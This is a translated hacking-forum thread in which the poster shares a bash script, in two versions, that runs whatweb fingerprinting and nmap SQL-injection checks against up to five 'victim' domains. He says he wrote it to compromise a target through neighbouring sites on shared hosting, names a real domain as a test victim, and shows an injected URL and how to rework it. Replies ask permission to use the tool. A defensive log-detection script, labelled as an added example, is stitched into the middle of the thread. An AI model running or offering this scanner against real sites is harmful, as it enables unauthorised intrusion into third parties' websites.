SQLi Scanner Bash (sh) - koecroet - 05-23-2012
Assalamualaikum wr.wb
This started last night when I wanted to own a target that, as far as I could tell, no longer had any vulnerabilities, but it was still on shared hosting.
So I scanned the domains on the same server as my target's domain, because my plan was to do jumping.
But there were a lot of domains on that server, and it wasn't feasible to scan them one by one by typing out the command. So I just wrote this simple bash script. It has 2 steps: information gathering, then scanning for the SQLi (SQL injection) bug or vulnerability.
With this tool we can input 5 victims at once in a single scan. It will then tell you which CMS the site uses, and whether the domain we scanned is served in full (200) or is a domain that only gets redirected (301).
OK, let's get straight to it: save it under any name you like, e.g. apaja.sh
Code:
#!/bin/bash
#this is opensource
#email : [email protected]
##################################################
#color
##################################################
lightgreen='\e[1;32m'
lightblue='\e[1;34m'
blue='\e[0;34m'
lightcyan='\e[1;36m'
yellow='\e[1;33m'
red='\e[1;31m'
purple='\e[0;35m'
##################################################
#source
##################################################
clear
{
echo "
..######...#######..##.......####.....######...######.....###....##....##
.##....##.##.....##.##........##.....##....##.##....##...##.##...###...##
.##.......##.....##.##........##.....##.......##........##...##..####..##
..######..##.....##.##........##......######..##.......##.....##.##.##.##
.......##.##..##.##.##........##...........##.##.......#########.##..####
.##....##.##....##..##........##.....##....##.##....##.##.....##.##...###
..######...#####.##.########.####.....######...######..##.....##.##....##"
echo ""
echo "This tools can help you to know about your target."
echo "work at two steps: Information Gathering & Vulnerability Assesment (only SQLi)"
echo "and you can input a target to this tools up to 5."
echo "now! lets do it!."
echo "[C] Copyright by KoecroeT."
echo "########################################################"
echo ""
echo "You can input domain what u want to scan : ... "
echo "before that, please follow the rules!"
echo "Please input without http://"
echo "example: "
echo "http://victim.com <<< [that's wrong]"
echo "victim.com <<< [that's right]"
echo "=============================================================="
echo ""
echo -ne $yellow "target 1 : "
read website1
echo ""
echo "=============================================================="
echo ""
echo -ne $lightcyan "target 2 : "
read website2
echo ""
echo "=============================================================="
echo ""
echo -ne $lightgreen "target 3 : "
read website3
echo ""
echo "=============================================================="
echo ""
echo -ne $lightblue "target 4 : "
read website4
echo ""
echo "=============================================================="
echo ""
echo -ne $purple "target 5 : "
read website5
echo ""
echo "=============================================================="
echo -e $yellow "Information Gathering of $website1 ..."
# -z tests for an empty target; the input is quoted so it stays one argument
if [ -z "$website1" ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb "$website1"
fi
echo ""
echo "=============================================================="
echo -e $lightcyan "Information Gathering of $website2 ..."
if [ -z "$website2" ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb "$website2"
fi
echo ""
echo "=============================================================="
echo -e $lightgreen "Information Gathering of $website3 ..."
if [ -z "$website3" ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb "$website3"
fi
echo ""
echo "=============================================================="
echo -e $lightblue "Information Gathering of $website4 ..."
if [ -z "$website4" ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb "$website4"
fi
echo ""
echo "=============================================================="
echo -e $purple "Information Gathering of $website5 ..."
if [ -z "$website5" ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb "$website5"
fi
echo ""
echo "=============================================================="
echo ""
echo -e $yellow "Vulnerability Assesment of SQLi from $website1 ..."
echo -e $yellow ""
if nmap --script=sql-injection "$website1" | grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $lightcyan "Vulnerability Assesment of SQLi from $website2 ..."
echo -e $lightcyan ""
if nmap --script=sql-injection "$website2" | grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $lightgreen "Vulnerability Assesment of SQLi from $website3 ..."
echo -e $lightgreen ""
if nmap --script=sql-injection "$website3" | grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $lightblue "Vulnerability Assesment of SQLi from $website4 ..."
echo -e $lightblue ""
if nmap --script=sql-injection "$website4" | grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $purple "Vulnerability Assesment of SQLi from $website5 ..."
echo -e $purple ""
if nmap --script=sql-injection "$website5" | grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
}
Just for testing, here's an example victim: percikschool.com
As usual, if you want to edit it, please don't delete or leave out the author's name, so you don't get called a plagiarist.
If the SQLi bug result shows up like this, we have to modify it first:
Code: /content.php?id=11'%20OR%20sqlspider&page=berita&act=showdetail
Remember: the "&" after the word sqlspider is moved to the very end. Then what comes after the word spider is copied to the front, after the question mark. The correct form will then read like this:
Code: /content.php?page=berita&act=showdetail&id=11
################## FIX ################################# FIX ####################
Since this thread got bumped again, hehe, here's a fix for the newest version of nmap.
Code:
#!/bin/bash
#this is opensource
#email : [email protected]
##################################################
#color
##################################################
lightgreen='\e[1;32m'
lightblue='\e[1;34m'
blue='\e[0;34m'
lightcyan='\e[1;36m'
yellow='\e[1;33m'
red='\e[1;31m'
purple='\e[0;35m'
##################################################
#source
##################################################
clear
{
echo "
..######...#######..##.......####.....######...######.....###....##....##
.##....##.##.....##.##........##.....##....##.##....##...##.##...###...##
.##.......##.....##.##........##.....##.......##........##...##..####..##
..######..##.....##.##........##......######..##.......##.....##.##.##.##
.......##.##..##.##.##........##...........##.##.......#########.##..####
.##....##.##....##..##........##.....##....##.##....##.##.....##.##...###
..######...#####.##.########.####.....######...######..##.....##.##....##"
echo ""
echo "This tools can help you to know about your target."
echo "work at two steps: Information Gathering & Vulnerability Assesment (only SQLi)"
echo "and you can input a target to this tools up to 5."
echo "now! lets do it!."
echo "[C] Copyright by KoecroeT."
echo "########################################################"
echo ""
echo "You can input domain what u want to scan : ... "
echo "before that, please follow the rules!"
echo "Please input without http://"
echo "example: "
echo "http://victim.com <<< [that's wrong]"
echo "victim.com <<< [that's right]"
echo "=============================================================="
echo ""
echo -ne $yellow "target 1 : "
read website1
echo ""
echo "=============================================================="
echo ""
echo -ne $lightcyan "target 2 : "
read website2
echo ""
echo "=============================================================="
echo ""
echo -ne $lightgreen "target 3 : "
read website3
echo ""
echo "=============================================================="
echo ""
echo -ne $lightblue "target 4 : "
read website4
echo ""
echo "=============================================================="
echo ""
echo -ne $purple "target 5 : "
read website5
echo ""
echo "=============================================================="
echo -e $yellow "Information Gathering of $website1 ..."
# -z tests for an empty target; the input is quoted so it stays one argument
if [ -z "$website1" ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb "$website1"
fi
echo ""
echo "=============================================================="
echo -e $lightcyan "Information Gathering of $website2 ..."
if [ -z "$website2" ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb "$website2"
fi
echo ""
echo "=============================================================="
echo -e $lightgreen "Information Gathering of $website3 ..."
if [ -z "$website3" ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb "$website3"
fi
echo ""
echo "=============================================================="
echo -e $lightblue "Information Gathering of $website4 ..."
if [ -z "$website4" ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb "$website4"
fi
echo ""
echo "=============================================================="
echo -e $purple "Information Gathering of $website5 ..."
if [ -z "$website5" ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb "$website5"
fi
echo ""
echo "=============================================================="
echo ""
echo -e $yellow "Vulnerability Assesment of SQLi from $website1 ..."
echo -e $yellow ""
if nmap --script=http-sql-injection "$website1" | grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $lightcyan "Vulnerability Assesment of SQLi from $website2 ..."
echo -e $lightcyan ""
if nmap --script=http-sql-injection "$website2" | grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $lightgreen "Vulnerability Assesment of SQLi from $website3 ..."
echo -e $lightgreen ""
if nmap --script=http-sql-injection "$website3" | grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $lightblue "Vulnerability Assesment of SQLi from $website4 ..."
echo -e $lightblue ""
if nmap --script=http-sql-injection "$website4" | grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $purple "Vulnerability Assesment of SQLi from $website5 ..."
echo -e $purple ""
if nmap --script=http-sql-injection "$website5" | grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
}
thanks before 17-August-2013
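From the defender's side, the probe URL shown in the post above leaves a recognisable trace in web server logs: the `sqlspider` marker in the query string. The following is an added example, not part of the original post, that pulls such requests out of an access log and reports which parameter was probed; the log lines are constructed and the function names are hypothetical.

```shell
#!/bin/sh
# Added example (not from the thread): find requests carrying the
# "sqlspider" probe marker in a common/combined-format access log.

# Constructed sample log lines; addresses are documentation ranges.
sample_log() {
cat <<'EOF'
198.51.100.7 - - [17/Aug/2013:10:00:01 +0700] "GET /content.php?id=11'%20OR%20sqlspider&page=berita&act=showdetail HTTP/1.1" 200 5120
198.51.100.7 - - [17/Aug/2013:10:00:02 +0700] "GET /content.php?id=11&page=berita'%20OR%20sqlspider&act=showdetail HTTP/1.1" 200 5120
203.0.113.20 - - [17/Aug/2013:10:01:10 +0700] "GET /content.php?id=11&page=berita&act=showdetail HTTP/1.1" 200 5120
203.0.113.9 - - [17/Aug/2013:10:02:30 +0700] "GET /index.php?q=1%27+or+SQLSPIDER HTTP/1.1" 500 312
EOF
}

# Reads log lines on stdin; prints "source<TAB>path<TAB>probed-parameter"
# for every request whose target contains the marker (any letter case).
detect_sqlspider() {
  awk '
    {
      target = $7                      # request target in this log format
      if (tolower(target) !~ /sqlspider/) next
      q = index(target, "?")
      path = (q ? substr(target, 1, q - 1) : target)
      n = split((q ? substr(target, q + 1) : ""), pairs, "&")
      param = "-"
      for (i = 1; i <= n; i++)
        if (tolower(pairs[i]) ~ /sqlspider/) {
          eq = index(pairs[i], "=")
          param = (eq ? substr(pairs[i], 1, eq - 1) : pairs[i])
          break
        }
      printf "%s\t%s\t%s\n", $1, path, param
    }'
}

# Reads log lines on stdin; prints "source hit-count", one source per line.
hits_per_source() {
  detect_sqlspider | cut -f1 | sort | uniq -c | awk '{print $2, $1}'
}

# Stand-alone run over the constructed sample.
sample_log | hits_per_source
```

Several parameters probed on one path by a single source within seconds is the pattern to alert on; an HTTP 500 on such a request (last sample line) marks a handler worth reviewing for unparameterised queries.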
RE: SQLi Scanner Bash (sh) - ekawithoutyou - 05-23-2012
Grabbing it first, PERTAMAXX
RE: SQLi Scanner Bash (sh) - iKONspirasi - 05-23-2012
Wow, this mod just keeps getting better
+2 from me, bro, because you made it yourself
RE: SQLi Scanner Bash (sh) - fake666 - 05-23-2012
This is cool
permission to download it, bro
RE: SQLi Scanner Bash (sh) - childiez - 05-23-2012
nice share, bro...
permission to try it out
^_^
RE: SQLi Scanner Bash (sh) - ekawithoutyou - 05-23-2012
there, finally found the ID, lol
RE: SQLi Scanner Bash (sh) - iyan squid - 05-23-2012
this is the kind of thing I've been waiting for, heheheh, permission to use it, bro,
RE: SQLi Scanner Bash (sh) - permana - 05-23-2012
The result of combining Whatweb with Nmap . .
Nice sharing
RE: SQLi Scanner Bash (sh) - zasad - 05-23-2012
permission to download, aah, eh, but how do you use it????
RE: SQLi Scanner Bash (sh) - koecroet - 05-23-2012
(05-23-2012, 10:37 PM)zasad Wrote: permission to download, aah, eh, but how do you use it????
just input the target, bro, then press enter